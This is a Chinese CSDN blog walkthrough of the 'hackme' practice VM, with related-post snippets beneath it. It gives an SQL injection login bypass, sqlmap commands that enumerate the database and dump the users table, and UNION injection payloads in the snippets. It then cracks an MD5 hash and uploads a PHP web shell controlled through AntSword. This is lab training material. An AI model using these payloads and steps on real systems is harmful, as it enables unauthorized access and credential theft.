hackme靶机

最新推荐文章于 2024-09-04 10:21:45 发布
最新推荐文章于 2024-09-04 10:21:45 发布
阅读量267 收藏 5
点赞数 3
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45079558/article/details/141864942
版权

扫描端口

先使用kali中的nmap工具

未发现目标

使用御剑2014

不断的测试发现172.16.1.182是目标

进入主页发现是登录页面,没有用户名及密码,但是页面有注册链接,进行注册用户

2.使用所注册的用户登陆成功

使用御剑典藏版扫描他的目录

创建账号并登录

登录后输入' or 1=1#

输入1进行抓包

用sqlmap验证是否有sql漏洞

sqlmap -u "http://172.16.1.197/welcome.php" --data="search=1" --  cookie="PHPSESSID=gnpfr7rt8kbfco8383t2d32oum"  --level=3

查看所有数据库

sqlmap -u "http://172.16.1.197/welcome.php" --data="search=1" --cookie="PHPSESSID=gnpfr7rt8kbfco8383t2d32oum"  --dbs

查看当前数据库

sqlmap -u "http://172.16.1.197/welcome.php" --data="search=1" --cookie="PHPSESSID=gnpfr7rt8kbfco8383t2d32oum"  --current-db

查看数据库中的表

sqlmap -u "http://172.16.1.197/welcome.php" --data="search=1" --cookie="PHPSESSID=gnpfr7rt8kbfco8383t2d32oum"  -D webapphacking --tables

查看users表中的列

sqlmap -u "http://172.16.1.197/welcome.php" --data="search=1" --cookie="PHPSESSID=gnpfr7rt8kbfco8383t2d32oum"  -D webapphacking -T users --columns

查出所有数据

sqlmap -u "http://172.16.1.197/welcome.php" --data="search=1" --cookie="PHPSESSID=gnpfr7rt8kbfco8383t2d32oum"  -D webapphacking -T users -C name,user,address,id,pasword --dump

使用md5解密方法进行解密superadmin用户的密码

登录解密后的超级管理员用户

登录后传一句话木马

成功上传

复制链接地址使用蚁剑连接

亚历山大——纯真丁一郎
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Hackme靶机渗透
m0_50584370的博客
06-01 248
hackme靶机渗透
Hackme靶机 保姆级最详细教程!!!
2401_85783544的博客
07-29 505
最后直接dump,把内容下载下来,我们看到了superadmin超级管理员,他的密码是加密状态,进行解密。2.用御剑扫描一下1-255的端口,发现59和60之间出现了一个奇怪的131,我们可以尝试访问一下,发现登录成功说明131就是靶机的地址.4.输入刚才注册的用户名和密码,可以看到登录进来了,我们输入sql注入语句 ' or 1=1 #9.这个时候我们在访问之前的一个上传目录uploads,可以看到我们上传的6.php。8.我们去直接登录,可以看到上传按钮,这个时候上传一个一句话木马。
Hackme 靶机
weixin_71053667的博客
07-29 361
注册,进入页面,点击search。1.靶机导入,扫描端口。md5解码,解码后结果。查看数据库中所有的表。
hackme靶机攻略
qq_68186313的博客
07-29 601
12选择superadmin对应的密码2386acb2cf356944177746fc92523983并解密。8、已经判断完数据库查询表有3列,那么联合查询3列,查出数据库名。10、联合查询通过内置库查询当前数据库使用的表中的列。2、打开御剑,扫描端口,得到hackme靶机IP。9、联合查询通过内置库查询当前数据库使用的表。5、 到这一步发现可以进行sql注入。7、判断数据库当前查询表有几列。11、查询表中我们需要的数据。15、连接木马并进行系统控制。14、上传一句话木马。
hackme靶机 教程
weixin_57682301的博客
07-29 122
植入成功后再网址中访问2.php 没有报错证明植入成功,打开蚁剑将网址进行绑定,密码为cmd,创建一个文件,成功证明获得shell权限。扫描ip以及目录找到首页注册登录,进行联合查询找到回显点,使用database()找到数据库名称。将上传的改成jpg格式的一句话木马抓包后将后缀名改回为php即可放行。根据列名user和password找出他的用户名密码。在网址中执行上传的1.php,证明上传成功。根据表名users找到表内的列名。再使用相同的方法将下面的木马植入。根据数据库名找到数据库内的表名。
hackme靶机渗透
Tender*的博客
08-02 115
hackme靶机渗透
hackme靶机通关攻略
2301_80402555的博客
09-03 318
输入-1' union select group_concat(column_name),2,3 from information_schema.columns where table_schema='webapphacking' and table_name='users'#输入-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking' #
Hackme靶机通关攻略
qq_65852138的博客
09-03 185
Hackme靶机通关攻略
hackme靶机漏洞解析
m0_59151303的博客
07-29 356
将下载好的靶机拖入到VMware中,填写靶机机名称(随便起一个)和路径虚拟机设置里修改网络状态为NAT模式点击编辑》虚拟网络编辑器做如下箭头点击,可以看到NAT网卡得到所有信息,包括网络地址分配信息通过上述发现,这里我们直从192.168.204.128开始扫描用御剑扫描工具扫描虚拟机的NAT网段,发现靶机的IP是192.168.204.139直接访问什么也没有2、端口扫描使用kali命令扫描nmap -A 192.168.204.139-p-发现开放22和80端口,包括对应的服务。
HACKME:1靶机
JKding123的博客
10-22 978
HACKME:1 靶机地址 https://www.vulnhub.com/entry/hackme-1,330/ 靶机IP:192.168.3.142 kaliIP:192.168.3.133 主机发现 root@kali:~# arp-scan -l 端口扫描 开放了80、22端口 目录扫描 root@kali:~/dirsearch# python3 dirsearch.py -u http://192.168.3.142/ -e * 依次访问试试 http://192.168.3.142/lo
靶机渗透 hackme-1(详解,适合新手)
君莫hacker的博客
09-05 6582
靶机hackme-1的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘SQL注入文件上传漏洞三、 漏洞利用反弹shell方法一:一句话木马,蚁剑连接反弹shell方法二:system命令执行四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布时间 18 Jul 2019 作者 x4bx54 难度 简单 靶机基本介绍: “hackme”是一个
HACK ME靶机
qq_49101841的博客
10-01 1194
❀本篇关于信息安全实训时靶场训练的操作笔记。
靶机渗透 HACKME-2 (详细渗透,适合新手渗透)
君莫hacker的博客
09-06 4019
靶机HACKME:2的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-2,618/ 作者 x4bx54 发布日期 2020年12月6日 难度 中等 靶机基本介绍: hackme2”是一个中等难度的关卡。这是hackme系列的第二部分,其中有更多的控件用于阻止恶意攻击。此外,你还必须跳出框框来利
Linux高性能服务器编程 总结索引 | 第2章:IP协议详解
AsherGu的博客
08-29 1244
IP服务的特点;IPv4头部结构;IP分片;IP路由:IP模块工作流程,路由机制,路由表更新;IP转发;重定向;IPv6头部结构:IPv6固定头部结构,IPv6扩展头部
Linux字符设备驱动 -- regulator子系统
xi_xix_i的博客
09-01 828
Linux驱动之Regulator子系统Linux 内核之电源篇(加载流程)regulator,翻译就是调节器。一些可以输出电流电压的设备可以使用该子系统。举个例子,一个PMIC有多路输出,每一路输出都可以给很多外设、芯片供电。那么每一路输出,我都可以认为他是一个regulator。
Linux:vim编辑器的基本使用
最新发布
2401_86544677的博客
09-04 491
当然,也可以直接删除。vim可以直接用键盘上的光标来上下左右移动,但正规的vim是用小写英文字母「h」、「j」、「k」、「i」,分别控制光标左、下、上、右移一格。」键,再输入您想寻找的字符,如果第一次找的关键字不是您想要的,可以一直 按「n」会往前寻找到您要的关键字为止。「#」:「#」号表示一个数字,在冒号后输入一个数字,再按回车键就会跳到该行了,如输入数字15, 再回车,就会跳到文章的第15行。「/关键字」: 先按「/」键,再输入您想寻找的字符,如果第一次找的关键字不是您想要的,可以一直按。
Linux---文件(2)---文件描述符&&缓冲区(语言级)
m0_75102051的博客
09-03 577
本文介绍Linux中的文件描述符和语言级缓冲区
实时Linux性能监控脚本:周期性自动统计CPU、内存和IO使用情况
promise524的博客
08-30 1044
Shell脚本实现每3秒钟监控系统的 CPU 占用率、内存使用情况、IO使用情况、每个 CPU 核心的占用率、CPU 占用率最高的前10个进程以及/opt目录的磁盘空间变化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值